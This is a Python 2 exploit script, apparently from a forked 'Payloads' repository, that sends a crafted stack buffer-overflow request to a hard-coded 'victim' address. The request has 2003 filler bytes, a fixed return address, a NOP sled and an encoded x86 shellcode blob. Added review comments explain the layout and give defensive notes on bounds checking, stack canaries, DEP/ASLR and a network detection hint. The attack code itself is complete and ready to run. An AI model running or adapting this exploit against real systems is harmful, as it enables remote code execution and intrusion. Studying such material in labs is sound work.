forked from sh377c0d3/Payloads
Buffer_Overflow_1.py
import socket
import sys
# Proof-of-concept that builds one oversized request and sends it to a TCP
# service. Python 2 only: `print` is used as a statement, and the plain and
# b"" string literals below are concatenated freely (Python 3 would raise
# TypeError on the first `buff += b"..."`).
#
# Layout of the request, in order: a service-specific prefix, 2003 filler
# bytes, a 4-byte value, 10 bytes of 0x90, then an opaque binary blob.
# NOTE(review): this matches the usual shape of a stack-overflow test case
# (filler up to the saved return address, replacement address, NOP padding,
# payload) -- presumably what is intended; the target binary is not shown.
#
# Defensive reading: a service reachable this way copies request data into a
# fixed-size buffer without checking its length. The fix is a bounds-checked
# copy on the server side; stack canaries, DEP/NX and ASLR raise the cost of
# turning such an overflow into code execution. On the wire, a long run of
# 0x41 followed by 0x90 bytes toward the service port is a simple detection
# hint for this exact request shape.
buff = "Vuln Service" # Enter Vulnerable Service
# 2003 bytes of 0x41 ("A") used as filler; the offset is specific to whatever
# target this was written against and is not derivable from this file.
buff += "A" * 2003
# 4 bytes, 0x625011AF when read little-endian.
# NOTE(review): presumably the value that lands on the saved return address;
# a fixed address like this only holds if the module it points into is loaded
# at a non-randomised base -- confirm against the target.
buff += "\xAF\x11\x50\x62"
# 10 bytes of 0x90 (x86 NOP) placed between the 4-byte value and the blob.
buff += "\x90" * 10
# No-op: appends an empty string.
buff += b""
# Opaque machine-code blob, reproduced unchanged. What it does cannot be
# verified from this listing.
# NOTE(review): the leading bytes (\xd9\x74\x24\xf4 decodes as
# `fnstenv [esp-0xc]`) look like the get-PC stub of a self-decoding x86
# payload, in which case static inspection of the remaining bytes will not
# show the final instructions.
buff += b"\xda\xd3\xd9\x74\x24\xf4\xba\x91\x65\x54\xa4\x5e\x29"
buff += b"\xc9\xb1\x52\x31\x56\x17\x83\xc6\x04\x03\xc7\x76\xb6"
buff += b"\x51\x1b\x90\xb4\x9a\xe3\x61\xd9\x13\x06\x50\xd9\x40"
buff += b"\x43\xc3\xe9\x03\x01\xe8\x82\x46\xb1\x7b\xe6\x4e\xb6"
buff += b"\xcc\x4d\xa9\xf9\xcd\xfe\x89\x98\x4d\xfd\xdd\x7a\x6f"
buff += b"\xce\x13\x7b\xa8\x33\xd9\x29\x61\x3f\x4c\xdd\x06\x75"
buff += b"\x4d\x56\x54\x9b\xd5\x8b\x2d\x9a\xf4\x1a\x25\xc5\xd6"
buff += b"\x9d\xea\x7d\x5f\x85\xef\xb8\x29\x3e\xdb\x37\xa8\x96"
buff += b"\x15\xb7\x07\xd7\x99\x4a\x59\x10\x1d\xb5\x2c\x68\x5d"
buff += b"\x48\x37\xaf\x1f\x96\xb2\x2b\x87\x5d\x64\x97\x39\xb1"
buff += b"\xf3\x5c\x35\x7e\x77\x3a\x5a\x81\x54\x31\x66\x0a\x5b"
buff += b"\x95\xee\x48\x78\x31\xaa\x0b\xe1\x60\x16\xfd\x1e\x72"
buff += b"\xf9\xa2\xba\xf9\x14\xb6\xb6\xa0\x70\x7b\xfb\x5a\x81"
buff += b"\x13\x8c\x29\xb3\xbc\x26\xa5\xff\x35\xe1\x32\xff\x6f"
buff += b"\x55\xac\xfe\x8f\xa6\xe5\xc4\xc4\xf6\x9d\xed\x64\x9d"
buff += b"\x5d\x11\xb1\x32\x0d\xbd\x6a\xf3\xfd\x7d\xdb\x9b\x17"
buff += b"\x72\x04\xbb\x18\x58\x2d\x56\xe3\x0b\x58\xaf\xbf\xe3"
buff += b"\x34\xad\x3f\xf0\x16\x38\xd9\x92\x86\x6d\x72\x0b\x3e"
buff += b"\x34\x08\xaa\xbf\xe2\x75\xec\x34\x01\x8a\xa3\xbc\x6c"
buff += b"\x98\x54\x4d\x3b\xc2\xf3\x52\x91\x6a\x9f\xc1\x7e\x6a"
buff += b"\xd6\xf9\x28\x3d\xbf\xcc\x20\xab\x2d\x76\x9b\xc9\xaf"
buff += b"\xee\xe4\x49\x74\xd3\xeb\x50\xf9\x6f\xc8\x42\xc7\x70"
buff += b"\x54\x36\x97\x26\x02\xe0\x51\x91\xe4\x5a\x08\x4e\xaf"
buff += b"\x0a\xcd\xbc\x70\x4c\xd2\xe8\x06\xb0\x63\x45\x5f\xcf"
buff += b"\x4c\x01\x57\xa8\xb0\xb1\x98\x63\x71\xc1\xd2\x29\xd0"
buff += b"\x4a\xbb\xb8\x60\x17\x3c\x17\xa6\x2e\xbf\x9d\x57\xd5"
buff += b"\xdf\xd4\x52\x91\x67\x05\x2f\x8a\x0d\x29\x9c\xab\x07"
# Plain IPv4 TCP client socket. No timeout is set, and the socket is not
# closed if connect/recv/send raises (no try/finally or context manager).
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Hard-coded destination address and port.
s.connect(('10.10.10.27', 9501)) # Victim IP and Port
# Reads and prints up to 1024 bytes that the service sends on connect
# (Python 2 print statement).
print s.recv(1024)
# Sends the assembled request in one call, then closes the connection
# without reading any reply.
s.send(buff)
s.close()